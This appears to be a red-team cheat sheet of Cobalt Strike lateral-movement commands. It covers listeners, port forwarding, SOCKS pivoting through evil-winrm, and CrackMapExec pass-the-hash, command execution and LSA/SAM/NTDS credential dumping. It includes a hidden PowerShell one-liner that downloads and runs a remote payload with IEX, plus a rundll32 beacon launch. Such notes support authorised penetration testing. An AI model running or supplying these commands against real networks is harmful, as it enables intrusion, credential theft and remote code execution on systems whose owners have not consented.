# Cobalt Strike

## Lateral Movement 

### Initial Access

Use HTTP listener and scripted web delivery 

### General Lateral Movment 

Set up an SMB listener and use that when moving with jump command

### HTTP Shells

* Set up a HTTP listener
  * HTTP host is the first target compromised (foothold machine) 
  * HTTP Host (Stager) same as above
  * HTTP Port (C2) is 443

* On foothold machine port forward to teamserver
  * rportfwd 443 \<teamserver> 443

* On foothold machine jump across

  * jump winrm \<target> \<HTTP listener above>

* For further hops new listeners and portfwrds need to occur for any machine that cant talk to the foothold directly

### Double Hop&#x20;

When going over winrm and psexec you may encounter double hop issues same as usual.

```
jump psexec 127.0.0.1 SMB

# After this use spawned session
```

### Evil Winrm

Useful for when you need to pipe through a box that you cant get a beacon on. E.g. applocker&#x20;

* Have HTTP listener set up as above (for this named redir) with rportfwd
* Set up scripted web delivery&#x20;
  * Local Host = Foothold
  * Local port = 443&#x20;
  * Listener = redir&#x20;
  * Type = powershell x64
* SOCKS proxy through foothold&#x20;
  * socks 9051
* Use evil-winrm (<https://github.com/Hackplayers/evil-winrm>)
  * proxychains evil-winrm -i \<ip> -u Domain\username -p 'Password'
* Pass creds and launch scripted web delivery on target2
  * $password = "Password" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\Username",$password); invoke-command -computername TARGET2 -Credential $cred -scriptblock {powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('[http://FOOTHOLDIP:443/pivtest'))"}](http://192.168.100.12:443/pivtest'\)\)%22%7D)
  * Keep WINRM alive for session to stay alive (or migrate to another process)

### CrackMapExec

<https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference>

```
Socks Proxy through as before
# Test login and get hostname 
crackmapexec smb <IP> -u <username> -p <password> [-d <domain>] [--local-auth]

# Pass the hash
crackmapexec smb <IP> -u <username> -H <hash>

# Execute Commands
crackmapexec -u <username> -p <password> -x whoami [--exec-method wmiexec/smbexec/atexec]

# Dumps
crackmapexec smb <ip> -u <username> -p <password> [--lsa] [--sam] [--ntds [vss]]
```

### Dll

```
rundll32 C:\beacon.dll,Start
```

### Passing Powershell creds

```
$password = "Password123" | ConvertTo-SecureString -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential("Domain\User",$password); invoke-command -computername 192.168.144.197 -Credential $cred -scriptblock {whoami}
```

## General Tips

* Make\_token is only for cleartext passwords
* Rubeus asktgt doesnt work so well with the /domain flag set